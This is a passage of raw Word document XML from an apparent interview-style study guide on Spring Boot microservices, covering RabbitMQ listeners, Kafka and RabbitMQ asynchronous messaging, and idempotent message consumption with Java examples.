    <w:p w14:paraId="7C9B266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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671D4AC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SimpleMessageListenerContainer messageListenerContainer(ConnectionFactory connectionFactory,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CBB7BF"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MessageListener messageListener) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4754FE57"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impleMessageListenerContainer container = new SimpleMessageListenerContainer();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AE354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ConnectionFactory(connectionFactory);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103EF7A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QueueNames("your-queue-name");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAF9C1B"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container.setMessageListener(messageListener);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E049AD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eturn container;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B5EF12"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2BA156C3"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678A4CC8"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e. Listen to RabbitMQ Messages in the Consumer Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB07B9C"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You can now consume messages asynchronously:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7082D92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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D27474"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ublic class RabbitMQConsumerService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CA6F91" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B26D6F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RabbitListener(queues = "your-queue-name")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C11413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public void receiveMessage(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFF5DA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System.out.println("Received message: " + message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB9A45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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE380FD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D857D4" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="00000000" w:rsidP="007E64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2EC8E">
          <v:rect id="_x0000_i2857" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AE4BC4" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Summary of Key Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D5979"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Kafka Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7E446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roducer sends messages to a topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A14291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sumer listens to the topic and processes messages asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327A5916"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Use @KafkaListener to consume messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB87E21"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lastRenderedPageBreak/>
        <w:t>RabbitMQ Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CB895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Producer sends messages to an exchange with a routing key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4561724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Consumer listens to the queue bound to the exchange and processes messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466AD2AF"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Use @RabbitListener to consume messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B214DD5"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Asynchronous Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B39815"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Both Kafka and RabbitMQ allow for asynchronous message passing between services, enabling </w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDE1DD7"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Microservices communicate asynchronously by producing and consuming messages through topics (Kafka) or queues (RabbitMQ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672BB47E"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B83B7D" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Both Kafka and RabbitMQ can scale horizontally by adding more consumers or producers to handle high message volumes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CEEB99" w14:textId="36E04CE4" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D312778" w14:textId="77777777" w:rsidR="007E64D6" w:rsidRPr="007E64D6" w:rsidRDefault="007E64D6" w:rsidP="007E64D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With this setup, you can easily implement </w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous communication</w:t>
      </w:r>
      <w:r w:rsidRPr="007E64D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between your Spring Boot microservices using Kafka or RabbitMQ, ensuring that the services can work independently without tight coupling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D78C124" w14:textId="77777777" w:rsidR="00187C12" w:rsidRDefault="00000000" w:rsidP="00187C12">
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="77942C08">
          <v:rect id="_x0000_i2858" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9685A8" w14:textId="3CFC7FE3"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6" w:name="_Toc197867910"/>
      <w:r w:rsidRPr="00414D65">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you ensure idempotent message consumption while processing messages from queue in Spring Boot microservice</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="696"/>
    </w:p>
    <w:p w14:paraId="5760575A" w14:textId="7B84474A" w:rsidR="009455B4" w:rsidRPr="009455B4" w:rsidRDefault="009455B4" w:rsidP="00F819F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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To ensure </w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent message consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> while processing messages from a queue in a Spring Boot microservice, you need to implement a mechanism that ensures that processing the same message multiple times does not lead to inconsistent or duplicate results. This is crucial when working with message brokers like </w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where message delivery may not always be guaranteed to occur once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260401F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s how you can implement idempotency in your Spring Boot microservice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CB6A20"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C741F">
          <v:rect id="_x0000_i2859" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B2EC7F"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1. Understand Idempotency in the Context of Messaging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2797A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dempotency means that applying an operation multiple times does not produce different results after the initial operation. For example, if a message is consumed more than once, the system should process it the same way it did initially.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F2F35C"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FBA55">
          <v:rect id="_x0000_i2860" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6EE1B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2. Key Approaches to Achieve Idempotency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D62C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 are common strategies to implement idempotent message consumption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7FCAF1"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a. Use Unique Message Identifiers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07996FC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One common approach to ensure idempotent message consumption is by ensuring that each message has a unique identifier (like a UUID or a hash of the message content). When consuming a message, you store the message ID in a persistent store (like a database) to track whether it has already been processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24629C7C"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Steps to Implement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7619FD7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nclude Unique Message ID</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1C9AF6"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Ensure that the producer of the message includes a unique ID for each message, for example, using UUIDs or any other unique identifier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A71B12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Check for Processed Messages</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A5DA38"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n the consumer service, before processing the message, check if the message with that ID has already been processed. This can be done by checking a database or a cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B160E5" w14:textId="77777777" w:rsidR="009455B4" w:rsidRPr="009455B4" w:rsidRDefault="009455B4" w:rsidP="009455B4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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f the message has already been processed, ignore it; otherwise, process it and mark it as processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DF2721"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59ECF31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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72363B2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MessageConsumerService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25882ECC" w14:textId="77777777" w:rsidR="009455B4" w:rsidRPr="009455B4" w:rsidRDefault="009455B4" w:rsidP="009455B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="747803A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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B31ED3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MessageRepository messageRepository; // Database or cache to track processed messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05657FFE" w14:textId="77777777" w:rsidR="009455B4" w:rsidRPr="009455B4" w:rsidRDefault="009455B4" w:rsidP="009455B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21EBEB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abbitListener(queues = "your-queue-name")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A9BDC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handleMessage(String message, @Header("messageId") String messageId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E2E1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Check if the message has already been processed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE5395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if (messageRepository.existsById(messageId)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD4944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Duplicate message detected, skipping processing.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4849E01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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            return; // Ignore if already processed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5527442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5E6E4590" w14:textId="77777777" w:rsidR="009455B4" w:rsidRPr="009455B4" w:rsidRDefault="009455B4" w:rsidP="009455B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476F846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Process the message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3703C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ocessMessage(message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059921D8" w14:textId="77777777" w:rsidR="009455B4" w:rsidRPr="009455B4" w:rsidRDefault="009455B4" w:rsidP="009455B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB41D8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Mark the message as processed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDEB25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messageRepository.save(new ProcessedMessage(messageId));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006D9B9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07F5ADDF" w14:textId="77777777" w:rsidR="009455B4" w:rsidRPr="009455B4" w:rsidRDefault="009455B4" w:rsidP="009455B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771BED3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void processMessage(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0568854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Your message processing logic here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CEB84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Processing message: " + message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367F9B4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58751B2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1F9FACFE"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In the above example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBC4F7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MessageRepository is used to track processed message IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12421F4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efore processing the message, we check if the message ID is already stored in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB637A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f the ID is already present, we skip processing, ensuring idempotency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228244E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C1D07">
          <v:rect id="_x0000_i2861" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9B45EF"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b. Use a Database with an "Upsert" Operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D6DC1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For scenarios where you are dealing with database operations, you can use the concept of an </w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>upsert</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (insert or update) operation to ensure that processing the same message multiple times does not result in duplicate entries or inconsistent states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC6E26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nsert or Update on Each Message</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When processing the message, attempt to insert the message's data into the database. If the data already exists, update the existing record instead of inserting a new one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE9820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Leverage Database Constraints</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use unique constraints (e.g., on the message ID or business keys) to ensure that duplicate entries are not allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2D5DB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2671314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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7BB3E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MessageConsumerService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B07EBB" w14:textId="77777777" w:rsidR="009455B4" w:rsidRPr="009455B4" w:rsidRDefault="009455B4" w:rsidP="009455B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38FA840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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA8E8C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MessageRepository messageRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F7C089" w14:textId="77777777" w:rsidR="009455B4" w:rsidRPr="009455B4" w:rsidRDefault="009455B4" w:rsidP="009455B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A22D4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Transactional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B09B2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abbitListener(queues = "your-queue-name")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3DA34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handleMessage(String message, @Header("messageId") String messageId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AEA34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Attempt to insert or update message data (upsert logic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBAD7A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messageRepository.upsertMessage(messageId, message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EEE04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0E1EE4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523A753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Here, the upsertMessage() method would either insert a new record or update an existing one depending on the presence of the message ID in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B076A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8280B0">
          <v:rect id="_x0000_i2862" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C5E307"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c. Using Idempotent Consumers in Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA35A0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In Kafka, idempotent producers are supported, but you can implement idempotent consumption by leveraging Kafka’s </w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer Groups</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and tracking offsets to ensure each message is only processed once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC0F018"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Steps to Implement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC79BB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Track Message Offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka stores the offset (position in the log) of consumed messages in a </w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer offset store</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which can be Kafka or an external store).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AE856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Use Exactly Once Semantics (EOS)</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka supports exactly-once semantics, which ensures that messages are processed once and only once, even in case of failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10401E1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Ensure Consumer State Is Stored</w:t>
      </w:r>
      <w:r w:rsidRPr="009455B4">
        <w:rPr>
